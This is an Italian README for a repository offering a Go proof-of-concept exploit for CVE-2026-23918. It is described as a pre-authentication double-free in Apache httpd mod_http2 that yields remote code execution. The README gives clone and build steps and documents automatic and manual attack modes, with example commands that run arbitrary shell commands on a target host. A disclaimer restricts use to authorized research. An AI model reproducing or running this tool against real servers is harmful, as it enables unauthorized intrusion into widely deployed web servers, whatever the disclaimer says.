
Exploit proof-of-concept basato su Go per CVE-2026-23918 che mira a una vulnerabilità double-free in Apache httpd mod_http2, consentendo l'esecuzione remota di codice pre-autenticazione tramite sequenze di memory spray e trigger.
Questo repository contiene un'implementazione proof-of-concept scritta in Go per uno scenario di corruzione della memoria pre-autenticazione che affligge Apache httpd con mod_http2. Il codice in questo repository dimostra un approccio spray-and-trigger contro un target vulnerabile ed è destinato a ricerche di sicurezza autorizzate, test e analisi difensiva.
Il progetto si concentra su un exploit proof-of-concept per CVE-2026-23918 e fornisce un'implementazione in un singolo file in exploit_poc.go. Il programma:
Questo repository non è destinato a un uso non autorizzato contro sistemi di terze parti.
Prima di compilare o eseguire il PoC, assicurati che siano disponibili:
Compila il binario con il seguente comando:
git clone https://github.com/gagaltotal/CVE-2026-23918-Double-free-Apache-httpd-mod_http2
cd CVE-2026-23918-Double-free-Apache-httpd-mod_http2
go mod init CVE-2026-23918-Double-free-Apache-httpd-mod_http2
go mod tidy
go run exploit_poc.go
go build -o exploit exploit_poc.go
Questo genera un eseguibile chiamato exploit nella root del progetto.


Il PoC supporta due modalità operative:
Questa modalità richiede l'accesso root e estrae automaticamente gli indirizzi di memoria necessari dal processo worker Apache di destinazione.
sudo ./exploit \
--pid 1234 \
--host 192.168.1.100 \
--port 443 \
--cmd "id > /tmp/pwned"
Questa modalità richiede che gli indirizzi della funzione system e dello slot di richiesta del scoreboard siano forniti manualmente.
./exploit \
--host 192.168.1.100 \
--port 443 \
--system 0x7f1234567890 \
--scoreboard 0x7f1234000000 \
--cmd "id > /tmp/pwned"
Le opzioni principali sono:
--host - Nome host o indirizzo IP di destinazione--port - Porta di destinazione (default: 443)--workers - Numero di thread worker spray (default: 32)--cmd - Comando da eseguire sul target--pid - ID del processo worker Apache per l'estrazione automatica dell'indirizzo di memoria--system - Indirizzo del simbolo system in modalità manuale--scoreboard - Indirizzo dello slot di richiesta del scoreboard in modalità manualesudo ./exploit --pid 1234 --host 10.0.0.20 --cmd "whoami"
./exploit \
--host 10.0.0.20 \
--system 0x7f1234567890 \
--scoreboard 0x7f1234000000 \
--cmd "uname -a"
Questo repository è fornito a scopo educativo e per valutazione di sicurezza difensiva. Qualsiasi uso al di fuori di un ambiente controllato e autorizzato è sconsigliato e potrebbe violare leggi o politiche applicabili.